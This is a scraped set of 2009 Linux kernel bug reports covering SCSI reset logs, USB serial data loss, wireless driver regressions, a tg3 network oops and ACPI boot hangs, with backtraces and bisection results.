06:25:06 svil kernel: scsi5: SCBPTR == 0x3, SCB_NEXT == 0xff00, SCB_NEXT2 == 0xffa4 Aug 3 06:25:06 svil kernel: CDB 0 0 0 0 0 0 Aug 3 06:25:06 svil kernel: STACK: 0x20 0x0 0x0 0x0 0x0 0x0 0x0 0x0 Aug 3 06:25:06 svil kernel: &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt; Dump Card State Ends &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; Aug 3 06:25:06 svil kernel: scsi5:0:3:0: Cmd aborted from QINFIFO Aug 3 06:25:06 svil kernel: scsi 5:0:3:0: Device offlined - not ready after error recovery Aug 3 06:25:06 svil kernel: scsi 5:0:4:0: Attempting to queue an ABORT message:CDB: 0x12 0x0 Aug 3 06:25:06 svil kernel: scsi 5:0:4:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:4:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:06 svil kernel: scsi 5:0:4:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:4:0: Attempting to queue a TARGET RESET message:CDB: 0x Aug 3 06:25:06 svil kernel: scsi5: Device reset code sleeping Aug 3 06:25:06 svil kernel: scsi5: Device reset timer expired (active 1) Aug 3 06:25:06 svil kernel: scsi5: Device reset returning 0x2003 Aug 3 06:25:06 svil kernel: Recovery SCB completes Aug 3 06:25:06 svil kernel: scsi 5:0:4:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:06 svil kernel: scsi 5:0:4:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:4:0: Device offlined - not ready after error recovery Aug 3 06:25:06 svil kernel: scsi 5:0:5:0: Attempting to queue an ABORT message:CDB: 0x12 0x0 Aug 3 06:25:06 svil kernel: scsi 5:0:5:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:5:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:06 svil kernel: scsi 5:0:5:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:5:0: Attempting to queue a TARGET RESET message:CDB: 0x Aug 3 06:25:06 svil kernel: scsi5: Device reset code sleeping Aug 3 06:25:06 svil kernel: scsi5: Device reset timer expired (active 1) Aug 3 06:25:06 svil kernel: scsi5: Device reset returning 0x2003 Aug 3 06:25:06 svil kernel: Recovery SCB completes Aug 3 06:25:06 svil kernel: scsi 5:0:5:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:06 svil kernel: scsi 5:0:5:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:5:0: Device offlined - not ready after error recovery Aug 3 06:25:06 svil kernel: scsi 5:0:6:0: Attempting to queue an ABORT message:CDB: 0x12 0x0 Aug 3 06:25:06 svil kernel: scsi 5:0:6:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:6:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:06 svil kernel: scsi 5:0:6:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:6:0: Attempting to queue a TARGET RESET message:CDB: 0x Aug 3 06:25:06 svil kernel: scsi5: Device reset code sleeping Aug 3 06:25:06 svil kernel: scsi5: Device reset timer expired (active 1) Aug 3 06:25:06 svil kernel: scsi5: Device reset returning 0x2003 Aug 3 06:25:06 svil kernel: Recovery SCB completes Aug 3 06:25:06 svil kernel: scsi 5:0:6:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:06 svil kernel: scsi 5:0:6:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:6:0: Device offlined - not ready after error recovery Aug 3 06:25:06 svil kernel: scsi 5:0:8:0: Attempting to queue an ABORT message:CDB: 0x12 0x0 Aug 3 06:25:06 svil kernel: scsi 5:0:8:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:8:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:06 svil kernel: scsi 5:0:8:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:8:0: Attempting to queue a TARGET RESET message:CDB: 0x Aug 3 06:25:06 svil kernel: scsi5: Device reset code sleeping Aug 3 06:25:06 svil kernel: scsi5: Device reset timer expired (active 1) Aug 3 06:25:06 svil kernel: scsi5: Device reset returning 0x2003 Aug 3 06:25:06 svil kernel: Recovery SCB completes Aug 3 06:25:06 svil kernel: scsi 5:0:8:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:06 svil kernel: scsi 5:0:8:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:8:0: Device offlined - not ready after error recovery Aug 3 06:25:06 svil kernel: scsi 5:0:9:0: Attempting to queue an ABORT message:CDB: 0x12 0x0 Aug 3 06:25:06 svil kernel: scsi 5:0:9:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:9:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:06 svil kernel: scsi 5:0:9:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:9:0: Attempting to queue a TARGET RESET message:CDB: 0x Aug 3 06:25:06 svil kernel: scsi5: Device reset code sleeping Aug 3 06:25:06 svil kernel: scsi5: Device reset timer expired (active 1) Aug 3 06:25:06 svil kernel: scsi5: Device reset returning 0x2003 Aug 3 06:25:06 svil kernel: Recovery SCB completes Aug 3 06:25:06 svil kernel: scsi 5:0:9:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:06 svil kernel: scsi 5:0:9:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:9:0: Device offlined - not ready after error recovery Aug 3 06:25:06 svil kernel: scsi 5:0:10:0: Attempting to queue an ABORT message:CDB: 0x12 0x Aug 3 06:25:06 svil kernel: scsi 5:0:10:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:10:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:06 svil kernel: scsi 5:0:10:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:10:0: Attempting to queue a TARGET RESET message:CDB: 0 Aug 3 06:25:06 svil kernel: scsi5: Device reset code sleeping Aug 3 06:25:06 svil kernel: scsi5: Device reset timer expired (active 1) Aug 3 06:25:06 svil kernel: scsi5: Device reset returning 0x2003 Aug 3 06:25:06 svil kernel: Recovery SCB completes Aug 3 06:25:06 svil kernel: scsi 5:0:10:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:06 svil kernel: scsi 5:0:10:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:10:0: Device offlined - not ready after error recovery Aug 3 06:25:06 svil kernel: scsi 5:0:11:0: Attempting to queue an ABORT message:CDB: 0x12 0x Aug 3 06:25:06 svil kernel: scsi 5:0:11:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:11:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:06 svil kernel: scsi 5:0:11:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:11:0: Attempting to queue a TARGET RESET message:CDB: 0 Aug 3 06:25:06 svil kernel: scsi5: Device reset code sleeping Aug 3 06:25:06 svil kernel: scsi5: Device reset timer expired (active 1) Aug 3 06:25:06 svil kernel: scsi5: Device reset returning 0x2003 Aug 3 06:25:06 svil kernel: Recovery SCB completes Aug 3 06:25:06 svil kernel: scsi 5:0:11:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:06 svil kernel: scsi 5:0:11:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:11:0: Device offlined - not ready after error recovery Aug 3 06:25:06 svil kernel: scsi 5:0:12:0: Attempting to queue an ABORT message:CDB: 0x12 0x Aug 3 06:25:06 svil kernel: scsi 5:0:12:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:12:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:06 svil kernel: scsi 5:0:12:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:12:0: Attempting to queue a TARGET RESET message:CDB: 0 Aug 3 06:25:06 svil kernel: scsi5: Device reset code sleeping Aug 3 06:25:06 svil kernel: scsi5: Device reset timer expired (active 1) Aug 3 06:25:06 svil kernel: scsi5: Device reset returning 0x2003 Aug 3 06:25:06 svil kernel: Recovery SCB completes Aug 3 06:25:06 svil kernel: scsi 5:0:12:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:06 svil kernel: scsi 5:0:12:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:12:0: Device offlined - not ready after error recovery Aug 3 06:25:06 svil kernel: scsi 5:0:13:0: Attempting to queue an ABORT message:CDB: 0x12 0x Aug 3 06:25:06 svil kernel: scsi 5:0:13:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:13:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:06 svil kernel: scsi 5:0:13:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:13:0: Attempting to queue a TARGET RESET message:CDB: 0 Aug 3 06:25:06 svil kernel: scsi5: Device reset code sleeping Aug 3 06:25:06 svil kernel: scsi5: Device reset timer expired (active 1) Aug 3 06:25:06 svil kernel: scsi5: Device reset returning 0x2003 Aug 3 06:25:06 svil kernel: Recovery SCB completes Aug 3 06:25:06 svil kernel: scsi 5:0:13:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:06 svil kernel: scsi 5:0:13:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:13:0: Device offlined - not ready after error recovery Aug 3 06:25:06 svil kernel: scsi 5:0:14:0: Attempting to queue an ABORT message:CDB: 0x12 0x Aug 3 06:25:06 svil kernel: scsi 5:0:14:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:14:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:06 svil kernel: scsi 5:0:14:0: Command already completed Aug 3 06:25:06 svil kernel: scsi 5:0:14:0: Attempting to queue a TARGET RESET message:CDB: 0 Aug 3 06:25:06 svil kernel: scsi5: Device reset code sleeping Aug 3 06:25:07 svil kernel: scsi5: Device reset timer expired (active 1) Aug 3 06:25:07 svil kernel: scsi5: Device reset returning 0x2003 Aug 3 06:25:07 svil kernel: Recovery SCB completes Aug 3 06:25:07 svil kernel: scsi 5:0:14:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:07 svil kernel: scsi 5:0:14:0: Command already completed Aug 3 06:25:07 svil kernel: scsi 5:0:14:0: Device offlined - not ready after error recovery Aug 3 06:25:07 svil kernel: scsi 5:0:15:0: Attempting to queue an ABORT message:CDB: 0x12 0x Aug 3 06:25:07 svil kernel: scsi 5:0:15:0: Command already completed Aug 3 06:25:07 svil kernel: scsi 5:0:15:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:07 svil kernel: scsi 5:0:15:0: Command already completed Aug 3 06:25:07 svil kernel: scsi 5:0:15:0: Attempting to queue a TARGET RESET message:CDB: 0 Aug 3 06:25:07 svil kernel: scsi5: Device reset code sleeping Aug 3 06:25:07 svil kernel: scsi5: Device reset timer expired (active 1) Aug 3 06:25:07 svil kernel: scsi5: Device reset returning 0x2003 Aug 3 06:25:07 svil kernel: Recovery SCB completes Aug 3 06:25:07 svil kernel: scsi 5:0:15:0: Attempting to queue an ABORT message:CDB: 0x0 0x0 Aug 3 06:25:07 svil kernel: scsi 5:0:15:0: Command already completed Aug 3 06:25:07 svil kernel: scsi 5:0:15:0: Device offlined - not ready after error recovery =================</t>
  </si>
  <si>
    <t>Data loss in CDC-ACM reception</t>
  </si>
  <si>
    <t>2.6.30.5</t>
  </si>
  <si>
    <t>2009-09-11 13:49 UTC</t>
  </si>
  <si>
    <t>Simon Berg</t>
  </si>
  <si>
    <t>2009-11-07 16:27 UTC</t>
  </si>
  <si>
    <t>I have a CDC-ACM device sending pseudo random data as fast as possible. On my computer I check the received sequence using a pseudo random generator identical to the one in the device. On a 2.6.29.2 kernel this runs without any errors. On a 2.6.30.5 kernel it fails after approx. 1e6 bytes. Using usbmon I can see that all data is correctly received but one packet (of 128 bytes) is lost on it's way to the tty. Checking git I found out that the older kernel hade the line tty-&gt;low_latency = 1; in cdc-acm.c After reintroducing that line into the driver it worked without errors agian.</t>
  </si>
  <si>
    <t>Unknown boot option warning message should not be printed for options which will be passed to kernel modules</t>
  </si>
  <si>
    <t>2009-09-11 16:28 UTC</t>
  </si>
  <si>
    <t>2012-06-13 16:57 UTC</t>
  </si>
  <si>
    <t>When passing a kernel parameter of the type: radeon.modeset=0 the kernel will throw a warning message that says "Unknown boot option 'radeon.modeset=0'. Ignoring..." However, the parameter is not ignored, it is passed to (and parsed by) the radeon module. We (Fedora QA/BugZappers) find people are often confused or worried by this message when we ask them to use such a parameter, and worry that it is not being applied correctly. The kernel should not print this warning/error message when the parameter is of a format that will cause it to be passed to a kernel module.</t>
  </si>
  <si>
    <t>Lockup in pty_write/tty_wakeup when using PPTP</t>
  </si>
  <si>
    <t>2009-09-15 13:18 UTC</t>
  </si>
  <si>
    <t>2009-09-18 16:35 UTC</t>
  </si>
  <si>
    <t>Created attachment 23095 [details] vsftpd stack trace Commit ac89a9174decf343de049a06fad75681f71890eb broke my PPTP: when the box tries to send large data using wide bandwidth (I tried vsftpd and nginx and speed about 500 Kbytes/s and faster), the box locks up after less than second. SysRq+P shows vsftpd or softirqd (in case of nginx) locked in tty_wakeup. One such backtrace is attached. Reverting ac89a9174decf343de049a06fad75681f71890eb fixes this regression.</t>
  </si>
  <si>
    <t>b43 causes panic at ifconfig down / shutdown</t>
  </si>
  <si>
    <t>2009-09-15 18:34 UTC</t>
  </si>
  <si>
    <t>2009-12-01 12:43 UTC</t>
  </si>
  <si>
    <t>This problem did not occur in 2.6.30 through 2.6.30.6 This problem does occur in 2.6.31-rc3 through 2.6.31 When shutting down the system, a panic occurs. System: PowerMac G4 Distribution: Ubuntu Kernel is custom built / mainline. backtrace is: ssb_device_enable [ssb] (unreliable) b43_is_hw_radio_enabled [b43] b43_rfkill_poll [b43] ieee80211_rfkill_poll [mac80211] cfg80211_rfkill_poll [cfg80211] rfkill_poll [rfkill]</t>
  </si>
  <si>
    <t>b43 firmware filenames are limited to 29 characters</t>
  </si>
  <si>
    <t>2009-09-16 03:47 UTC</t>
  </si>
  <si>
    <t>Dan Lenski</t>
  </si>
  <si>
    <t>2010-03-05 18:27 UTC</t>
  </si>
  <si>
    <t>The b43 wireless driver includes a parameter, fwpostfix, allowing users to select different firmware versions based on directory name, relative to /lib/firmware. (E.g.: b43-v1 vs b43-v2) This is handy for developers testing lots of different firmware versions. However, when b43 requests the loading of a firmware file, the subdirectory and filename are limited to a total of 29 characters. Anything longer is silently truncated, resulting in errors when loading firmware. Example: rename /lib/firmware/b43 to /lib/firmware/b43-blahblah. Try to load the b43 module: # modprobe b43 fwpostfix=-blahblah If you have a revision-5 BCM43xx device, this will fail! The driver will try to load a firmware file called "b43-blahblah/ucode5.fw" which will succeed, and then another called "b43-blahblah/b0g0bsinitvals5.fw" which will *FAIL* because the name is 31 characters long. The syslog messages are misleading: b43-phy10 ERROR: Firmware file "b43-blahblah/b0g0bsinitvals5.fw" not found This error gives no indication that the filename has been truncated in being passed to the userspace firmware loader!</t>
  </si>
  <si>
    <t>Wireless cards cannot associate to APs (wpa_supplicant keeps doing scans)</t>
  </si>
  <si>
    <t>2.6.32-rc0</t>
  </si>
  <si>
    <t>2009-09-20 16:30 UTC</t>
  </si>
  <si>
    <t>Fabio Scaccabarozzi</t>
  </si>
  <si>
    <t>2009-09-30 15:56 UTC</t>
  </si>
  <si>
    <t>Created attachment 23121 [details] dmesg non-working output I'm running b43 driver on amd64, I upgraded to the latest git after running 2.6.31-rc9 for some time and found connection not working. Attached there's a log of the b43 driver. Running iwevent showed that it kept cycling through scans but never associating. Initially I thought it was a problem with b43 itself but trying to upgrade also on the laptop (ath5k on x86) showed the very same problem. I bisected the commits and found the culprit: cfg80211: fix SME connect (bbac31f4c0339f6c51afbd0edfb4959df9b53fa9) Reverting the commit fixes the issues, connection works again.</t>
  </si>
  <si>
    <t>kernel oops with latest tg3 changes</t>
  </si>
  <si>
    <t>2.6.31-git</t>
  </si>
  <si>
    <t>2009-09-21 14:33 UTC</t>
  </si>
  <si>
    <t>2009-10-01 17:53 UTC</t>
  </si>
  <si>
    <t>Somewhen after boooting up, the kernel oopses with the following output (captured via serial console, everything else is dead): [ 355.736310] BUG: unable to handle kernel paging request at 0000006600000002 [ 355.736390] IP: [&lt;ffffffff810a87ce&gt;] put_page+0x16/0x127 [ 355.736390] PGD 0 [ 355.736390] Oops: 0000 [#1] PREEMPT SMP [ 355.736390] last sysfs file: /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_governors [ 355.736390] CPU 3 [ 355.736390] Modules linked in: radeon ttm drm i2c_algo_bit bnep sco l2cap bluetooth binfmt_misc w83627hf_wdt dm_snapshot dm_mirror dm_region_hash dm_log fuse nfsd nfs lockd fscache nfs_acl auth_rpcgss sunrpc ipv6 xfs exportfs ext3 jbd eeprom lm85 hwmon_vid powernow_k8 sbp2 loop raid1 md_mod snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm snd_seq snd_timer snd_seq_device psmouse i2c_amd756 i2c_amd8111 snd rtc_cmos soundcore serio_raw pcspkr evdev i2c_core rtc_core amd_rng snd_page_alloc button rtc_lib processor rng_core k8temp ext4 mbcache jbd2 crc16 sha256_generic aes_x86_64 aes_generic cbc dm_crypt dm_mod sg sd_mod crc_t10dif sr_mod cdrom usbhid hid pata_amd sata_sil ohci_hcd ohci1394 libata tg3 libphy ehci_hcd ieee1394 scsi_mod usbcore thermal fan thermal_sys [last unloaded: scsi_wait_scan] [ 355.736390] Pid: 13, comm: ksoftirqd/3 Not tainted 2.6.31-rc5-01932-g882e979 #88 To Be Filled By O.E.M. [ 355.845876] RIP: 0010:[&lt;ffffffff810a87ce&gt;] [&lt;ffffffff810a87ce&gt;] put_page+0x16/0x127 [ 355.845876] RSP: 0018:ffffc90000603cc8 EFLAGS: 00010292 [ 355.845876] RAX: 0000000000000000 RBX: 0000000000000001 RCX: 0000000000000870 [ 355.845876] RDX: ffff88007dca8680 RSI: ffff88007fc027e0 RDI: 0000006600000002 [ 355.845876] RBP: ffffc90000603cf8 R08: ffffc90000603d38 R09: ffff8800519814be [ 355.845876] R10: 000000000000000e R11: ffff88007e592600 R12: ffff880051981480 [ 355.845876] R13: ffffffff81289db3 R14: ffff88007e550400 R15: ffff880051981554 [ 355.845876] FS: 00007f2e24a956f0(0000) GS:ffffc90000600000(0000) knlGS:0000000000000000 [ 355.845876] CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b [ 355.845876] CR2: 0000006600000002 CR3: 0000000001001000 CR4: 00000000000006e0 [ 355.845876] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 355.845876] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [ 355.845876] Process ksoftirqd/3 (pid: 13, threadinfo ffff88007ffe4000, task ffff88007ffe2380) [ 355.845876] Stack: [ 355.845876] 00000000ffffffff 0000000000000001 ffff880051981480 ffffffff81289db3 [ 355.845876] &lt;0&gt; ffff88007e550400 ffff880051981554 ffffc90000603d18 ffffffff81224780 [ 355.845876] &lt;0&gt; ffff880051981480 ffff880051981480 ffffc90000603d38 ffffffff8122446f [ 355.845876] Call Trace: [ 355.845876] &lt;IRQ&gt; [ 355.845876] [&lt;ffffffff81289db3&gt;] ? packet_rcv_spkt+0xcc/0xd7 [ 355.845876] [&lt;ffffffff81224780&gt;] skb_release_data+0x73/0xd0 [ 355.845876] [&lt;ffffffff8122446f&gt;] __kfree_skb+0x1e/0x8b [ 355.845876] [&lt;ffffffff812245b1&gt;] kfree_skb+0xa3/0xab [ 355.845876] [&lt;ffffffff81289db3&gt;] packet_rcv_spkt+0xcc/0xd7 [ 355.845876] [&lt;ffffffff8122bb25&gt;] netif_receive_skb+0x28a/0x2d0 [ 355.845876] [&lt;ffffffff8122bcd4&gt;] napi_skb_finish+0x2d/0x44 [ 355.845876] [&lt;ffffffff8122c17c&gt;] napi_gro_receive+0x2f/0x34 [ 355.845876] [&lt;ffffffffa00bee4a&gt;] tg3_poll+0x6ec/0x940 [tg3] [ 355.845876] [&lt;ffffffff8122c291&gt;] net_rx_action+0x82/0x1c6 [ 355.845876] [&lt;ffffffff8104ae12&gt;] __do_softirq+0x118/0x225 [ 355.845876] [&lt;ffffffff8104a385&gt;] ? ksoftirqd+0x0/0x164 [ 355.845876] [&lt;ffffffff8100cd9c&gt;] call_softirq+0x1c/0x28 [ 355.845876] &lt;EOI&gt; [ 355.845876] [&lt;ffffffff8100e842&gt;] do_softirq+0x3e/0x8f [ 355.845876] [&lt;ffffffff8104a40e&gt;] ksoftirqd+0x89/0x164 [ 355.845876] [&lt;ffffffff8105af79&gt;] kthread+0x8d/0x95 [ 355.845876] [&lt;ffffffff8100cc9a&gt;] child_rip+0xa/0x20 [ 355.845876] [&lt;ffffffff81039d44&gt;] ? finish_task_switch+0x56/0xe3 [ 355.845876] [&lt;ffffffff8100c62d&gt;] ? restore_args+0x0/0x30 [ 355.845876] [&lt;ffffffff8105aeec&gt;] ? kthread+0x0/0x95 [ 355.845876] [&lt;ffffffff8100cc90&gt;] ? child_rip+0x0/0x20 [ 355.845876] Code: fe ff eb 08 e8 db d7 fe ff 41 54 9d 41 5b 5b 41 5c 41 5d c9 c3 55 48 89 e5 41 57 41 56 41 55 41 54 53 48 83 ec 08 0f 1f 44 00 00 &lt;48&gt; 8b 07 48 89 fb 66 a9 00 c0 74 26 66 85 c0 79 04 48 8b 5f 10 [ 355.845876] RIP [&lt;ffffffff810a87ce&gt;] put_page+0x16/0x127 [ 355.845876] RSP &lt;ffffc90000603cc8&gt; [ 355.845876] CR2: 0000006600000002 [ 356.143175] ---[ end trace 121ba4541c000396 ]--- [ 356.148089] Kernel panic - not syncing: Fatal exception in interrupt I'm in the bisecting process, actual status is: good: 2.6.31-rc5-01926-gb6080e1 bad: 2.6.31-rc5-01932-g882e979 I hope I can finish the rest of this bisect run somewhen later today. I'll also attach the dmesg of a working kernel shortly. # lspci -nn 00:06.0 PCI bridge [0604]: Advanced Micro Devices [AMD] AMD-8111 PCI [1022:7460] (rev 07) 00:07.0 ISA bridge [0601]: Advanced Micro Devices [AMD] AMD-8111 LPC [1022:7468] (rev 05) 00:07.1 IDE interface [0101]: Advanced Micro Devices [AMD] AMD-8111 IDE [1022:7469] (rev 03) 00:07.2 SMBus [0c05]: Advanced Micro Devices [AMD] AMD-8111 SMBus 2.0 [1022:746 a] (rev 02) 00:07.3 Bridge [0680]: Advanced Micro Devices [AMD] AMD-8111 ACPI [1022:746b] (rev 05) 00:07.5 Multimedia audio controller [0401]: Advanced Micro Devices [AMD] AMD-8111 AC97 Audio [1022:746d] (rev 03) 00:0a.0 PCI bridge [0604]: Advanced Micro Devices [AMD] AMD-8131 PCI-X Bridge [1022:7450] (rev 12) 00:0a.1 PIC [0800]: Advanced Micro Devices [AMD] AMD-8131 PCI-X IOAPIC [1022:7451] (rev 01) 00:0b.0 PCI bridge [0604]: Advanced Micro Devices [AMD] AMD-8131 PCI-X Bridge [1022:7450] (rev 12) 00:0b.1 PIC [0800]: Advanced Micro Devices [AMD] AMD-8131 PCI-X IOAPIC [1022:7451] (rev 01) 00:18.0 Host bridge [0600]: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technology Configuration [1022:1100] 00:18.1 Host bridge [0600]: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map [1022:1101] 00:18.2 Host bridge [0600]: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller [1022:1102] 00:18.3 Host bridge [0600]: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control [1022:1103] 00:19.0 Host bridge [0600]: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technology Configuration [1022:1100] 00:19.1 Host bridge [0600]: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map [1022:1101] 00:19.2 Host bridge [0600]: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller [1022:1102] 00:19.3 Host bridge [0600]: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control [1022:1103] 01:00.0 USB Controller [0c03]: Advanced Micro Devices [AMD] AMD-8111 USB [1022:7464] (rev 0b) 01:00.1 USB Controller [0c03]: Advanced Micro Devices [AMD] AMD-8111 USB [1022:7464] (rev 0b) 01:0a.0 USB Controller [0c03]: NEC Corporation USB [1033:0035] (rev 43) 01:0a.1 USB Controller [0c03]: NEC Corporation USB [1033:0035] (rev 43) 01:0a.2 USB Controller [0c03]: NEC Corporation USB 2.0 [1033:00e0] (rev 04) 01:0b.0 Mass storage controller [0180]: Silicon Image, Inc. SiI 3114 [SATALink/SATARaid] Serial ATA Controller [1095:3114] (rev 02) 01:0c.0 FireWire (IEEE 1394) [0c00]: Texas Instruments TSB43AB22/A IEEE-1394a-2000 Controller (PHY/Link) [104c:8023] 02:09.0 Ethernet controller [0200]: Broadcom Corporation NetXtreme BCM5703X Gigabit Ethernet [14e4:16a7] (rev 02) 04:00.0 Host bridge [0600]: Advanced Micro Devices [AMD] AMD-8151 System Controller [1022:7454] (rev 14) 04:01.0 PCI bridge [0604]: Advanced Micro Devices [AMD] AMD-8151 AGP Bridge [1022:7455] (rev 14) 05:00.0 VGA compatible controller [0300]: ATI Technologies Inc RV570 [Radeon X1950 Pro] [1002:7280] (rev 9a) 05:00.1 Display controller [0380]: ATI Technologies Inc RV570 [Radeon X1950 Pro] (secondary) [1002:72a0] (rev 9a)</t>
  </si>
  <si>
    <t>Brightness set to max on startup by acer-wmi module</t>
  </si>
  <si>
    <t>2009-09-22 11:45 UTC</t>
  </si>
  <si>
    <t>Denis Mukhin</t>
  </si>
  <si>
    <t>2010-10-08 18:22 UTC</t>
  </si>
  <si>
    <t>Particular environment where reproduced: Acer Aspire 3024 running Ubuntu 9.04 Desktop (kernel 2.6.28-11). On startup backlight brightness goes to max. IMHO it happens because of probe routine implementation in acer-wmi module. Looks pretty unreasonable for me: instead of preserving current value from WMI just sets it to max (15 in my case). Workaround: set particular "brightness" parameter value on module initialization.</t>
  </si>
  <si>
    <t>Kernel hangs on Compaq Evo N800c with ACPI enabled</t>
  </si>
  <si>
    <t>2009-09-22 21:13 UTC</t>
  </si>
  <si>
    <t>2009-10-02 14:45 UTC</t>
  </si>
  <si>
    <t>Kernel 2.6.31 hangs during boot on Compaq Evo N800c laptop when ACPI is enabled (works with acpi=off). 2.6.30 works fine. See https://bugzilla.redhat.com/show_bug.cgi?id=522057 Bisection resulted in commit ee1ca48fae7e575d5e399d4fdcfe0afc1212a64c: $ git bisect bad ee1ca48fae7e575d5e399d4fdcfe0afc1212a64c is first bad commit commit ee1ca48fae7e575d5e399d4fdcfe0afc1212a64c Author: Pallipadi, Venkatesh &lt;venkatesh.pallipadi@intel.com&gt; Date: Thu May 21 17:09:10 2009 -0700 ACPI: Disable ARB_DISABLE on platforms where it is not needed ARB_DISABLE is a NOP on all of the recent Intel platforms. For such platforms, reduce contention on c3_lock by skipping the fake ARB_DISABLE. Signed-off-by: Venkatesh Pallipadi &lt;venkatesh.pallipadi@intel.com&gt; Signed-off-by: Len Brown &lt;len.brown@intel.com&gt; :040000 040000 f05492fbba2c068f22d7aefca36896f07ff8611b 47e784478de3c386591a92181e7784f5d224a989 M arch :040000 040000 a379b031d617def0094cca3f56c2eda510a0604b cc00f83544238d1757fdf2a5e62206d1a49de2de M drivers Reverting this commit fixes the regression. CPU is Mobile Pentium 4-M: processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 2 model name : Mobile Intel(R) Pentium(R) 4 - M CPU 2.20GHz stepping : 7 cpu MHz : 2200.000 cache size : 512 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe up pebs bts cid bogomips : 4395.79 clflush size : 64 power management:</t>
  </si>
  <si>
    <t>BUG at drivers/scsi/scsi_lib.c:1108!</t>
  </si>
  <si>
    <t>2.6.31-07381-g7fa0772</t>
  </si>
  <si>
    <t>2009-09-23 11:13 UTC</t>
  </si>
  <si>
    <t>2009-10-02 17:32 UTC</t>
  </si>
  <si>
    <t>Created attachment 23148 [details] kernel .config used This is kernel version 2.6.31-07381-g7fa0772 (currently 2.6.31-git12), compiled with the gcc version 4.3.3, included in Slackware 13. I use this x86 kernel inside one Sun VirtualBox virtual machine, and one real machine with an AMD Duron CPU. The kernel is compiled with SMP, as you can see from the attached config, but is run on UP machines. I hit this BUG whenever I try to shutdown or reboot any of the machines. The backtrace is a PNG image with the virtualbox window, but the output is identical with the one on the real machine.</t>
  </si>
  <si>
    <t>iwlagn-4965: WPA Authentication times out</t>
  </si>
  <si>
    <t>2009-09-23 13:43 UTC</t>
  </si>
  <si>
    <t>sveina</t>
  </si>
  <si>
    <t>2009-10-08 17:03 UTC</t>
  </si>
  <si>
